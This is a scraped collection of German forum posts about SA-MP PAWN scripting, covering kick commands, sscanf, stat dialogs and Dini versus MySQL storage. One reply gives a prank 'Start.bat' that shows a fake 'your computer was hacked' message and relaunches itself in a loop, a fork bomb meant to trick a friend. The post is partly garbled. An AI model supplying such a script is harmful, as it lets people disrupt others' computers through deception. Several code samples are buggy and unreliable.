sscanf(params,"us[128]",pID,reason)
Der Pattern müsste so aussehen, falls du das sscanf-Plugin benutzt.
Oder den Stock-.-.
Ich denke jetzt klappt aber auch alles
MfG
Geronimo
sscanf(params,"us[128]",pID,reason)
Der Pattern müsste so aussehen, falls du das sscanf-Plugin benutzt.
Oder den Stock-.-.
Ich denke jetzt klappt aber auch alles
MfG
Geronimo
Alles anzeigenNachdem ich Junk Buster installiert habe geht mein Server nicht mehr an.
Ich bekomme folgende Errors :
[02:47:36] Error: Function not registered: 'Streamer_CallbackHook'
[02:47:36] Error: Function not registered: 'CreateDynamicObject'
[02:47:36] Error: Function not registered: 'DestroyDynamicObject'
[02:47:36] Error: Function not registered: 'Streamer_AppendArrayData'
[02:47:36] Error: Function not registered: 'Streamer_SetIntData'
[02:47:36] Error: Function not registered: 'DestroyAllDynamicObjects'
[02:47:36] Script[gamemodes/Selfmade.amx]: Run time error 19: "File or function is not found"
[02:47:36] Number of vehicle models: 0
Brauche Hilfe wäre euch sehr Dankbar !
ihh weg mit JunkBuster,
also erstens JunkBuster ist reiner Crap, zweitens genau das passiert und das meine ich auch bei JunkBuster.
Scripte dir was eigenes, ist nicht schwer, mach z.B. PVars
MfG
Geronimo
//EDIT: Oh 100ster Beitrag
Ich bin Ansprechpartner für Dini, MySQL brauch ich (noch) nicht und mein Root kann wie gesagt, dass nicht ab ;).
Alles anzeigenAlso wie gesagt Mysql ist viel schneller als Dini.
Dini ist ein File System und mit MySQL speichert
man die Daten Extern. MySQL ist sehr leicht zu lernen,
wenn man sich einen halben 2h damit beschäftigt kann
man es einigermaßen.
geronimo55
Du weist PAWN ist eine Scriptsprache und keine Programmiersprache?
Du weißt auch das Pawn auf C/C++ basiert, daher ist es wieder eine Programmiersprache bzw. eine .h einer Programmiersprache^^
Ich bezeichne Pawn als Programmiersprache, da es auch wieder was eigen ständiges ist.
MFG
Geronimo
Alles anzeigen
if(!strcmp("/stats", cmdtext, true))
{
new string[128],name[24];
GetPlayerName(playerid,name,24);
format(string,sizeof(string),"Name: %s\nLevel: %d\nMoney: %d\nPing: %d\nAdminlevel: %d",name,GetPlayerScore(playerid),GetPlayerMoney(playerid),GetPlayerPing(playerid),GetPVarInt(playerid,"Adminlevel")); // i% zu %d und ein Komma hinzugefügt
ShowPlayerDialog(playerid,STATS,DIALOG_STYLE_MSGBOX,"Deine Statistik",string,"OK","");
return 1;
}
Kommen die Errors noch ? :o
Dann nutz einfach MySQL.
Jap!
Du bist ja einer
Man kann %i oder %d nehmen ist beides das gleiche
%i hab ich da mal verwendet dann hat mein Server gecrasht
Ist ja egal, auf jeden Fall würde ich %d empfehlen
MFG
Geronimo
Alles anzeigenSehr geerthe Brotfische,
Ich arbeite seid kurzem mit Photoshop und wollte euch mal nach eurer Meinung fragen, was ihr von meinem
Webdesign hällt. Ich weiß derzeit noch nicht ob es für ein uCP werden soll, oder sonst was.
Ich werde mir überlegen was ich damit machen werde
Ich hoffe es kommt gut an, ich möchte nicht NUR eine Bewertung, sondern auch ein Grund.
Eventuell auch Verbesserungsvorschläge.
pfuuu,
das Ding sieht ja mal geil aus, wenn du es mir anbieten würdest würde ich zugreifen,
für Photoshop und Anfänger passt das doch
MfG
Geronimo
Alles anzeigenHallo,
Iwie komisch. Er kann das Adminlevel beim /stats Befehl nicht auslesen
if(!strcmp("/stats", cmdtext, true))
{
new string[128],name[24];
GetPlayerName(playerid,name,24);
format(string,sizeof(string),"Name: %s\nLevel: %d\nMoney: %d\nPing: %d\nAdminlevel: i%",name,GetPlayerScore(playerid),GetPlayerMoney(playerid),GetPlayerPing(playerid)GetPVarInt(playerid,"Adminlevel")); // Die Zeile in der alle Fehler sind
ShowPlayerDialog(playerid,STATS,DIALOG_STYLE_MSGBOX,"Deine Statistik",string,"OK","");
return 1;
}
Fehlercode:
C:\Users\Jonas\Documents\SAMP-Server\gamemodes\MeinServer.pwn(539) : error 017: undefined symbol "string"
C:\Users\Jonas\Documents\SAMP-Server\gamemodes\MeinServer.pwn(539) : error 017: undefined symbol "string"
C:\Users\Jonas\Documents\SAMP-Server\gamemodes\MeinServer.pwn(539) : error 029: invalid expression, assumed zero
C:\Users\Jonas\Documents\SAMP-Server\gamemodes\MeinServer.pwn(539) : fatal error 107: too many error messages on one line
Ohje,
es heißt nicht %i sondern %d mein Freund^^
der String löst sich selbst oder?
MFG
Geronimo
Du musst wissen, dass dini bei mehrfachen Durchgängen kurz vorm sterben ist und denn Server mithinunterzieht -> Lags.
MySQL hingegen wird extern ausgeführt und beansprucht nicht den Server komplett dafür.
Außerdem gibt es nicht sowas wie "Ich kann dini", da es keine Sprache oder vergleichbares ist, sondern nur ein Include mit Funktionen.
Du sagst ja auch nicht "Ich kann a_samp".
Mal so nebenbei, es gibt bessere Speichersysteme als dini und wer dies nicht erkennt, scheint noch bei der Frage zu hängen, was eigentlich SendClientMessage macht.
Du ich bin richtig Müde, ich habe den ganzen Tag lang an meinem Selfmade programmiert, da geht mir das relativ am ... vorbei, wie ich mich ausdrücke.
Also ich meinte damit, dass ich besser mit Dini umgehen kann, (als Anfänger).
Dini (Was ich auch geschrieben habe) beansprucht den Server 100%.
MySQL ist extern(Prozess) und stellt nur eine Verbindung her.
Allerdings, da mein Root Server MySQL nicht nimmt, habe ich einfach alles mit Dini, da mein Server eine Leistung hat die eigg. nur Server wie GRP-R haben, kann er das locker verarbeiten..
Sorry, dass ich mich falsch ausgedrückt hatte^^!
MFG
Geronimo
Alles anzeigenalso ich habe bei kick jetzt so was und wenn ich /kick schreibe dann werde ich gekickt ich wollte so machen /kick [Playerid] [Grund]
ocmd:kick(playerid,params[])
{
new pID,Grund[64],string[250];
format(string,sizeof(string),"AdmCmd: %s wurde von %s gekickt, Grund: %s",SpielerName(pID),SpielerName(playerid),Grund);
SendClientMessageToAll(ROT,string);
Kick(pID);
}
Brauchste sscanf zu
ocmd:kick(playerid, params[])
{
new pID,Grund[64],string[250];
if(sscanf(params, "us", pID,Grund))return SendClientMessage(playerid,FARBE,"/kick [ID/Name] [GRUND]");
new pID,Grund[64],string[250];
format(string,sizeof(string),"AdmCmd: %s wurde von %s gekickt, Grund: %s",SpielerName(pID),SpielerName(playerid),Grund);
SendClientMessageToAll(ROT,string);
Kick(pID);
}
MySQL ist nicht schwerer, man muss es bloß lernen.
MySQL ist übersichtlicher, schneller und fehlerunanfälliger als Files.
Jaja schon klar ... ich meine mit welchem ich am besten anfagen sollte und welches am besten erklärt ist
Das einfachste ist Dini.
Punkt.
Wer dir was anderes erzählt ist kein Anfänger oder hat keine Ahnung!
MFG
Geronimo
Hey ich wollte mal einen Freund von mir ärgen das er eine .txt datei aufmacht und das dan für xxx Sekunden die Maus und die Tastatur blockiert wird.
Du nennst die Datei "Start.bat"!!!
Hab hier was für dich:
@echo offecho ==================IHR COMPUTER WURDE GEHACKT=================================echo Der Computer wird jetzt runtergefahren...goto xx:start Start.batgoto x
Ja gut und wie fange ich jetzt am besten an um es zu lernen ?
ZitatMySQL ist nicht schwerer, man muss es bloß lernen.
MySQL ist übersichtlicher, schneller und fehlerunanfälliger als Files.
Du weißt das MySQL(SQL) das Schwerste ist was es zu lernen gibt.
Fang erst einmal an mit Dini:
Gibts nichts zu lernen:
//EDIT: Antwort zu Kommentar eingefügt!
Die Klammer war im ?> gefailt.
MfG
Geronimo
Wie schneller ?
Z.B.:
Loginsystem auf MySQL geht schneller, da der Account über einen "externen" Prozess geladen wird.
In Dini geht er ersteinmal die komplette Datei durch.
Bei MySQL sucht er in einer Tabelle und nicht in einer kompletten Datei.
Ich programmiere eher auf Dini, da ich Dini sehr gut kann...
MFG
Geronimo
Alles anzeigenHallo Liebe USER also ich habe ein kick befehle rein gemacht hier nochmall der kick befehle und also wenn ich ingame bin werde ich nicht gekickt hier ein sreccen
ocmd:kick(playerid,params[])
{
new pID,Grund[128],string[128];
if(sscanf(params,"us",pID,Grund)) return SendClientMessage(playerid,ROT,"Benutzung: /kick [playerid] [grund]");
format(string,sizeof(string),"AdmCmd: %s wurde von %s gekickt, Grund: %s",SpielerName(pID),SpielerName(playerid),Grund);
SendClientMessageToAll(ROT,string);
Kick(pID);
return 1;
}
Warum haste da überhaupt ein Return drinne wenn ich mal fragen darf? :O
Probier mal so:
ocmd:kick(playerid,params[])
{
new pID,Grund[64],string[250]; //String muss logischer weise größer als der Grund sein, da der Grund den kompletten String belegt!
if(sscanf(params,"us",pID,Grund)) return SendClientMessage(playerid,ROT,"Benutzung: /kick [playerid] [grund]");
format(string,sizeof(string),"AdmCmd: %s wurde von %s gekickt, Grund: %s",SpielerName(pID),SpielerName(playerid),Grund);
SendClientMessageToAll(ROT,string);
Kick(pID);
}
Hallo Leute ,
es geht darum ob es unterschiede zwischen Dini und Mysql gibt . Also ist es besser mit Mysql zu scripten oder mit Dini und warum ? Kann mir da einer weiter helfen ...
Mit freundlichen Grüßen CopyPaste
MySQL = Pro Scripter
Dini = Anfänger(-und Pro)
Aso und MySQL ist schneller, aber schwerer ;D
MfG
Geronimo
Alles anzeigenHi Leute,
ich habe folgende Probleme:
1. Wie kann ich einstellen, dass man wenn man im Prison schlägt gefreezet wird?
2. Wie speichre ich die Jailzeit beim loggout?
Danke im vorraus
LG
RaubEl
Hallo RaubEl,
du musst dafür den Stock "IsPlayerInArea" nutzen.
Du kannst damit die Koordinaten des Gefängnisses abfragen.
Danach kannst du mit TogglePlayerControllable(playerid,false); den Spieler freezen!
Die Jailzeit muss beim Logout ( OnPlayerDisconnect ) mit (falls du dini nutzt) mit dini_IntSet gespeichert werden.
MfG
Geronimo
Alles anzeigenwarum geht das bei mir nicht
public OnPlayerStateChange(playerid, newstate, oldstate)
{
if(newstate==PLAYER_STATE_DRIVER)
{
for(new i=0; i<sizeof(armycars); i++)
{
if(GetPlayerVehicleID(playerid)==armycars[i])
{
if(GetPVarInt(playerid,"Fraktion")!=1&&GetPVarInt(playerid,"Fraktion")!=2&&GetPVarInt(playerid,"Fraktion")!=3) RemovePlayerFromVehicle(playerid);
}
}
}
if(newstate==PLAYER_STATE_DRIVER)
{
for(new i=0; i<sizeof(fbicars); i++)
{
if(GetPlayerVehicleID(playerid)==fbicars[i])
{
if(GetPVarInt(playerid,"Fraktion")!=1&&GetPVarInt(playerid,"Fraktion")!=2&&GetPVarInt(playerid,"Fraktion")!=3) RemovePlayerFromVehicle(playerid);
}
}
}
if(newstate==PLAYER_STATE_DRIVER)
{
for(new i=0; i<sizeof(admincar); i++)
{
if(GetPlayerVehicleID(playerid)==admincar[i])
{
if(!IsPlayerAnAdmin(playerid,3)) RemovePlayerFromVehicle(playerid);
}
}
}
if(newstate==PLAYER_STATE_DRIVER)
{
for(new i=0; i<sizeof(vagoscars); i++)
{
if(GetPlayerVehicleID(playerid)==armycars[i])
{
if(GetPVarInt(playerid,"Fraktion")!=4) RemovePlayerFromVehicle(playerid);
}
}
}
return 1;
}
bitte helft mir
Du wenn du aber dann ein Fahrzeug spawnst verutschen die VehicleIDs, daher kann man das nur schlecht anwenden.
Ich lasse dir mal ein Stock für deine Armycars,
du kannst dann unter "OnPlayerEnterVehicle" folgendes schreiben:
Hier ist die Abfrage:
Stock:
Mit freundlichen Grüßen,
Geronimo